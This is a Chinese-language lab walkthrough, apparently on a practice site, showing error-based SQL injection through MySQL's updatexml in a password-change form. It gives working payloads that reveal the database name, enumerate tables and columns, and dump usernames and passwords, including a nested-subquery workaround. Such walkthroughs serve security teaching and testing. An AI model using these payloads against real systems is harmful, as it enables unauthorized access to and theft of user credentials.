文章目录
题意分析
通过简单的测试,我们可以知道,这个页面的功能就是更改你所输入的username
的password
。(就是改密码)通过看源码,我们可以知道,此页面对于username
字段有很严格的过滤。因此我们将注入的重点放在password
上。同时我们一定要保证输入的用户名一定要是正确的,否则只会返回错误页面。
通过上面这个测试,我们得到了一条报错信息:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
通过这条报错语句我们可以得到两个关键的注入信息:
password
的类型为单引号包裹的字符型。- 此网站的报错信息没有很好的屏蔽掉,我们可以利用报错来查表。
updatexml解析
updatexml
是SQL语法的一个函数:
UPDATEXML(XML_document, XPath_string, new_value)
参数:
1: XML_document是String格式,为XML文档对象的名称,文中为Doc
2:XPath_string (Xpath格式的字符串) ,用于匹配第一个参数中的部分内容。(就像使用正则表达式匹配一个文本的特定内容一样)
3: new_value,String格式,替换查找到的符合条件的数据。
在这里,我们利用updatexml
函数的报错机制进行注入,原理就是当第二个参数的格式和Xpath
的格式不符的时候,就会产生报错,我们可以将我们的payload
构造到第二个参数中,让其随着报错信息展示到页面上。
实战
先将注入的格式给出:
admin' or updatexml(1, (concat('#',(payload))), 1) #
首先看一下当前数据库的名称:
admin' or updatexml(1, concat('#', database()), 1) #
然后查看当前数据库中有哪些数据表:
updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0) #
由此我们得到该数据库下有4张数据表。我们现在来查一下users
表。
首先看一下users
表都有什么字段:
updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0) #
可以看到有三个字段id
, username
, password
那么,最后一步就是进行表的检索。
我们先用以上逻辑进行sql注入的构造:
updatexml(1, concat("#", (select group_concat(username) from users)), 0) #
当我们试图用上述语句查询username
字段的时候,发现报了一个错误:
You can't specify target table 'users' for update in FROM clause
那么我们该换一下思路,使用基于from
的子查询,将payload
构造到from
的子查询中。如下:
' or updatexml(1, concat('#', (select * from (select group_concat(username) from users) a)), 0) #
查询密码同理,由此我们就可以得到所有的数据了。